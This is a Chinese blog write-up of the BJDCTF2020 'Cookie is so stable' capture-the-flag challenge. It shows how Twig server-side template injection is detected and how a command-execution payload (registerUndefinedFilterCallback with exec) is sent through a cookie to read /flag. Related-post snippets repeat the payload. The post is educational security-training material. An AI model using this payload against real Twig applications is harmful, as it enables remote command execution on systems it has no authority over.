一天一道ctf 第29天

最新推荐文章于 2022-05-02 10:38:54 发布
最新推荐文章于 2022-05-02 10:38:54 发布
阅读量128 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/118652424
版权

鸽了好久
[BJDCTF2020]Cookie is so stable
在这里插入图片描述
先贴一张模板注入的经典流程图,按照流程图的注入payload对这个页面一步步试下去。
在这里插入图片描述
${77}没有执行成功,{{77}}执行成功输出49,{{7*‘7’}也输出49,说明是twig
在这里插入图片描述
在这里插入图片描述
网上查一下twig的模板注入payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

public function getFilter($name)
  {
    ...
    foreach ($this->filterCallbacks as $callback) {
    if (false !== $filter = call_user_func($callback, $name)) {
      return $filter;
    }
  }
  return false;
}
 
public function registerUndefinedFilterCallback($callable)
{
  $this->filterCallbacks[] = $callable;
}

通过registerUndefinedFilterCallback()注册exec为filter的回调函数加入filterCallbacks[]中,然后用getFilter()中的call_user_func()执行exec函数,参数为cat /flag。
bp抓包修改Cookie中的user得到flag。
在这里插入图片描述

scrawman
关注
一道ctf的misc题
12-18
一道ctf的misc题
CTF 一些漏洞模式
qq_41996851的博客
05-10 922
SSTI模板注入 SSTI初探 SSTI 常用payload; {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
BUUCTF SSTI模板注入小结(持续更新)
CN天狼
05-02 1520
BUUCTF部分SSTI模板注入小结 [护网杯 2018]easy_tornado [BJDCTF2020]The mystery of ip [BJDCTF2020]Cookie is so stable [CISCN2019 华东南赛区]Web11 [WesternCTF2018]shrine [GYCTF2020]FlaskApp [CSCCTF 2019 Qual]FlaskLight
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2788
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
BUUCTF [BJDCTF2020] Cookie is so stable
Senimo
01-03 474
BUUCTF [BJDCTF2020] Cookie is so stable 考点: Twig模版注入 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 首先启动环境: 其中导航栏包括Flag和Hint页面,依次点击查看,首先是Hint页面: 查看网页源码,得到: <h3>Welcome to BJDCTF 2020.Happy Game!</h3>
BUUCTF__web题解合集(五)
风过江南乱的博客
08-10 1107
1、[BJDCTF2020]The mystery of ip 2、[BJDCTF2020]Cookie is so stable 3、[WesternCTF2018]shrine 4、[BJDCTF2020]ZJCTF,不过如此 5、[CISCN 2019 初赛]Love Math
CTF技能树,为初学者的一个认识ctf
10-22
ctf的一个树状图而已
CTF从入门到提升(一).docx
12-18
CTF从入门到提升(一) CTF(Capture The Flag)是一种网络安全竞赛的形式,起源于西方传统运动,两军互相争夺旗帜,夺取敌军旗帜代表战败。在信息安全领域,CTF是通过各种攻击手法,获取服务器后寻找指定的字段,...
2021CTF工业信息安全大赛第一场题.rar
09-19
【标题】"2021CTF工业信息安全大赛第一场题.rar" 提供的信息表明,这是一个与2021年工业信息安全领域的CTF(Capture The Flag)比赛相关的压缩包文件,其中包含了第一场比赛的试题。CTF比赛通常涉及网络安全、密码学...
CTF——攻防世界第一篇
01-08
下午看了关于ctf的视频,发现自己什么也不懂,明明每个字都是我认识的中文,但是组合到一起就不明白了。「我好难……」 而且,看视频我似乎没什么的耐性,一下午下来还是发现自己没学到什么。所以,今,我决定...
2020/7/19 - [BJDCTF2020]Cookie is so stable - twg服务器端模板注入
抒情诗
07-20 383
这是道服务器端模板注入,过段时间总结一下各种payload到一篇文章里。 测试ssti漏洞的payload为 {{7*'7'}} 如果返回的是49就是twg注入,7777777是jinja2(这个我还没实验,摘自他人文章) 返回的是49,说明是twg模板,下面是固定的测试twg注入的payload, 一篇文章带你理解漏洞之 SSTI 漏洞 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
搭建一个ctf_由一道CTF赛题分析Twig SSTI利用方式
weixin_39620273的博客
11-22 659
前言在上周末刚刚结束的安恒6月赛DASCTF中,有一道web题涉及 Twig 模板注入,而两个月前的 volgactf 也涉及了同样的内容,但所使用的版本不同。本文通过CTF题的解法来分析 Twig 模板注入的利用方式Subscribe@DASCTF这是一道白盒代码审计题,给出的源码如下(作者注:本题目是基于Twig 1.x版本)phprequire_once "mail/smtp.cl...
[BUUCTF]刷题记录7
Huamang的博客
04-07 403
[BJDCTF2020]Cookie is so stable 模板注入——Twig模板 好像又是个模板注入 输入{{7*'7'}}得到了49,猜测是Twig 但是好像命令过滤的很严,看看能不能拿源码 hint.php提示: 可以发现提交的时候会设置一个cookie,里面的值可以进行模板注入 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}; ...
BUUCTF-刷题记录-4
qq_45628145的博客
09-29 854
WEB [CISCN 2019 初赛]Love Math 这题主要是通过给的那些函数来进行一个RCE,其中值得注意的就是进制转换函数base_convert()、dechex()了,我们的主要目的是造出来一个_GET,然后再通过这个来传入参数,进行RCE。而通过base_convert()函数可以进行任意进制间的一个转换,也就是可以构造出来任意的字符串,这里可以先通过一个base_convert()函数造出来一个hex2bin,然后通过dechex()函数把十进制转换成16进制,然后通过hex2bin()这
常见漏洞知识库(原理/场景/修复)
lefooter的博客
04-30 6115
SQL 注入 0x01 漏洞描述 SQL注入漏洞产生的原因是网站应用程序在编写时未对用户提交至服务器的数据进行合法性校验(类型、长度、业务参数合法性等),同时没有对用户输入数据进行有效地特殊字符过滤,使得用户的输入直接带入数据库执行,超出了SQL语句原来设计的预期结果,导致了SQL注入漏洞。 0x02 常见应用场景 SQL注入漏洞可能出现在一切与数据库交互的地方,比如常见的查询用户信息、查询订单信...
SSTI模板注入
Lemon's blog
05-09 2467
前言: 这几刷题一直遇到考察SSTI模板注入的题,之前也没有好好了解过,如果叙述原理的话需要扎实的python基础,现在python还学的不是太好,就以遇到的CTF题做一个总结。 什么是模板引擎 模板引擎是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的文档,就是将模板文件和数据通过模板引擎生成一个HTML代码。 什么是服务端模板...
BurpWeb安全学院之不安全的反序列化
lonmar的博客
07-27 2289
文章目录介绍1. 如何识别不安全的反序列化1.1. PHP序列化格式1.2 Java序列化格式2. 操作序列化对象2.1. 修改对象属性介绍实验2.2. 修改数据类型介绍实验3. 利用网站程序功能4. 魔术方法5. 注入任意对象介绍实验6. Gadget chains7. ysoserial8. PHPGGC9. Ruby 2.x Universal RCE Gadget Chain10. 构造PHP gadget chain11. 构造JAVA gadget chain12. PHAR反序列化 介绍 b
详解模板注入漏洞(上)
程序猿DD
01-06 2116
作者 | 原作者gosecure,翻译整理shan66来源 |http://gosecure.github.io/1.简介所谓模板注入,又称服务器端模板注入(SSTI),是2015年出...
[BJDCTF2020]Cookie is so stable(漏洞原理详解)
pakho_C的博客
04-18 3321
web第45题 [BJDCTF2020]Cookie is so stable 打开靶场 访问flag页面 一个输入框 访问hint页面,查看源码 提示与cookie有关 那么在flag页面输入后抓包观察 输入后显示 登陆后抓包显示为 做到这里又遇到新的知识点了,模板注入漏洞 参考大佬的博客:一篇文章带你理解漏洞之 SSTI 漏洞,讲的非常详细 漏洞原理: SSTI 怎么产生的 服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过
一道ctf隐写的例题
最新发布
03-05
我可以回答这个问题。以下是一道ctf隐写的例题: 题目描述:给定一张图片,其中隐藏了一段秘密信息。请使用隐写术解密该信息。 解题思路:首先,我们需要使用一些隐写术工具来分析图片,例如Stegsolve、Steghide等。通过分析,我们可以发现图片中隐藏了一段二进制代码。接下来,我们需要将二进制代码转换为ASCII码,从而得到秘密信息。 答案仅供参考,具体解题方法可能因题目而异。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值